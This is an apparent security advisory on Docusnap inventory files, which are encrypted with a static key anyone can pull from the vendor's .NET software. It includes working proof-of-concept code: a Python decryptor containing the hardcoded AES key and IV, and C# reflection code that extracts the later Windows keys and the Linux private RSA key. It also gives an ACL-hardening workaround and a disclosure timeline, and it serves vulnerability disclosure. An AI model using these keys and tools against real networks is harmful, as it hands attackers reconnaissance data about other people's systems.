Docusnap Inventory Files Encrypted with Static Key

Inventory files created by Docusnap, containing information like installed programs, firewall rules and local administrators, are encrypted with a static key. The decryption key can be obtained easily from the .NET application, downloadable from the vendor’s website. When following Docusnap’s installation instructions for Windows Domains, every domain user has read access to these files.

Details

Introduction

Docusnap is the market leader with its wizard-based IT inventory for various technologies such as Windows, Linux, HP-UX, VMware and more.

(from vendor’s homepage)

More Details

Docusnap provides a client software for inventorying Windows hosts. The program is intended to be executed automatically on a schedule directly on the clients. Collected information is written to a network share as an encrypted XML document. The central Docusnap server collects the files from the network share, decrypts them and processes them further. For the computers to be able to upload the inventory files, Docusnap recommends giving modify permissions to the AD group “Authenticated Users”. As modify permissions include read permissions, this means every domain user has access to the encrypted inventory files.

Decompiling the .NET server program, which can be downloaded from the vendor’s homepage, reveals that a static AES key is used for decrypting the inventory files in the function Docusnap.ServerAPI.Model.Tools.CryptoWinImport.DecryptScript. This key seems to be the same for every installation of this software. This renders the encryption useless, as attackers can download the program files from the vendor’s homepage, extract the decryption key and decrypt every Windows inventory file created by Docusnap. These inventory files do not include secrets, but contain other information useful for attackers, like a list of all local administrators, a list of installed programs or the firewall rules in place.

Inventory files of Linux systems are decrypted using different functions. The source code suggests that these files are encrypted using OpenSSL with a 4096 bit RSA key, handled in the function Docusnap.ServerAPI.Model.Tools.CryptoLinuxImport.EnumerateEncryptedLines. The private key is again hardcoded in the program. However, it was not verified that this key can indeed be used to decrypt inventory files created by the Docusnap Linux client.

Proof of Concept

The following Python code can be used to decrypt any Windows Docusnap inventory file:

from base64 import b64decode

import click
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad

K = "Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x".encode("utf-8")
IV = "N7IPe~R}w;1vuy5N".encode("utf-8")


@click.command()
@click.argument("file", type=click.File("r"))
def decrypt(file):
    data = file.read()
    raw = b64decode(data)
    cipher = AES.new(K, AES.MODE_CBC, iv=IV)
    res = unpad(cipher.decrypt(raw), AES.block_size)
    print(res.decode("utf-8"))

if __name__ == "__main__":
    decrypt()

The program expects the path to an encrypted Windows Docusnap inventory file as an argument:

$ decrypt_docusnap.py FILE.xml | xq
<?xml version="1.0" encoding="UTF-8"?>
<HostInformation>
  <System>
    <SystemInformation>Windows</SystemInformation>
[...]

Update 04.12.2024

Since Docusnap version 14, the C# assemblies have been obfuscated and the Windows encryption key has been rotated. Using .NET reflection, the decryption keys can still be obtained.

Proof of Concept

To get the current decryption keys the following code can be used:

using System;
using System.Reflection;
using Docusnap.ServerAPI.Model.Tools;

// Linux: the private RSA key is returned by a non-public static method.
Type cryptoLinuxImportType = typeof(Docusnap.ServerAPI.Model.Tools.CryptoLinuxImport);
var linux_private_key = cryptoLinuxImportType
    .GetMethod("GetPrivateKey", BindingFlags.NonPublic | BindingFlags.Static)
    .Invoke(null, new object[] { }); // static method: no instance needed
Console.WriteLine("Linux private key:\n" + linux_private_key);

// Windows: the old (pre-version 14) and rotated AES keys are kept in
// non-public static fields of CryptoWinImport.
var v = new Docusnap.ServerAPI.Model.Tools.CryptoWinImport();
var _oldScriptKey = typeof(Docusnap.ServerAPI.Model.Tools.CryptoWinImport)
    .GetField("_oldScriptKey", BindingFlags.NonPublic | BindingFlags.Static).GetValue(v);
var _newScriptKey = typeof(Docusnap.ServerAPI.Model.Tools.CryptoWinImport)
    .GetField("_newScriptKey", BindingFlags.NonPublic | BindingFlags.Static).GetValue(v);

Console.WriteLine("Old Windows key: " + _oldScriptKey);
Console.WriteLine("New Windows key: " + _newScriptKey);

Workaround

The ACL of the file share should be adjusted to prevent read access to the inventory files created on other computers.
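One way to implement this workaround on the file server, as an added example that is not part of the advisory or of the vendor's documentation: the script below turns the upload folder into a drop folder (clients may create files but not list or read the folder, the Docusnap server account keeps full access) and audits the result. The folder path and the server service account are assumed placeholders.

```powershell
# Added example, not from the advisory or the vendor: hardens the NTFS ACL of a
# Docusnap upload folder so that clients can still drop inventory files but no
# domain user can read files uploaded by other hosts. Path and account are assumed.
$SharePath     = 'D:\DocusnapInventory'   # assumed local folder behind the share
$ServerAccount = 'CONTOSO\svc-docusnap'   # assumed Docusnap server service account

function Get-BroadReadAccess {
    # Audit helper: Allow ACEs that grant read access to broad principals.
    param([string]$Path)
    $broad = @('NT AUTHORITY\Authenticated Users', 'Everyone', 'BUILTIN\Users')
    $read  = [int][System.Security.AccessControl.FileSystemRights]::ReadData
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $broad -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band $read) -ne 0)
    }
}

function Set-DropFolderAcl {
    param([string]$Path, [string]$ServerAccount)
    $acl = Get-Acl -Path $Path
    # Stop inheriting from the parent folder and drop the inherited ACEs, then
    # remove the explicit ones so no earlier "Modify" grant survives.
    $acl.SetAccessRuleProtection($true, $false)
    $acl.Access | Where-Object { -not $_.IsInherited } |
        ForEach-Object { $null = $acl.RemoveAccessRule($_) }
    $subtree = 'ContainerInherit, ObjectInherit'
    $rules = @(
        # Administrators, SYSTEM and the Docusnap server keep access to all files.
        @('BUILTIN\Administrators', 'FullControl', $subtree, 'None', 'Allow'),
        @('NT AUTHORITY\SYSTEM',    'FullControl', $subtree, 'None', 'Allow'),
        @($ServerAccount,           'Modify',      $subtree, 'None', 'Allow'),
        # Clients may create files in this folder only; no ReadData/ListDirectory,
        # so they cannot read or enumerate other hosts' files.
        @('NT AUTHORITY\Authenticated Users', 'CreateFiles, ReadAttributes, Synchronize', 'None', 'None', 'Allow'),
        # Each uploading host keeps Modify on the files it created itself.
        @('CREATOR OWNER', 'Modify', $subtree, 'InheritOnly', 'Allow')
    )
    foreach ($r in $rules) {
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule -ArgumentList $r
        $acl.AddAccessRule($rule)
    }
    Set-Acl -Path $Path -AclObject $acl
}

Set-DropFolderAcl -Path $SharePath -ServerAccount $ServerAccount
# After hardening this should print nothing; any row is a remaining read grant.
Get-BroadReadAccess -Path $SharePath | Format-Table IdentityReference, FileSystemRights
```

Share-level permissions can stay as recommended by the vendor, since the NTFS ACL is the more restrictive of the two; verify with a test upload from a client that collection still works.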

Fix

Attackers should not be able to read the clear text inventory files. This can for example be achieved by using an asymmetric encryption method with unique keys for each installation. Another option would be to prevent users from reading the inventory files.

Security Risk

Attackers with read access to Docusnap inventory files are able to decrypt their contents. This discloses information that can be used for further attacks. Due to the requirement for access to the files and the low severity of the information, this vulnerability is rated to pose a low risk only.

Timeline

  • 2024-09-12 Vulnerability identified
  • 2024-09-17 Customer approved disclosure to vendor
  • 2024-10-30 Asked vendor for security contact
  • 2024-11-07 Asked vendor for security contact via different mail
  • 2024-11-08 Vendor notified
  • 2024-11-08 Phone call with vendor for clarification
  • 2024-12-04 Vendor released version 14 and considers the vulnerability fixed
  • 2024-12-11 Vendor received updated PoC
  • 2025-02-16 CVE assigned
  • 2025-03-04 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/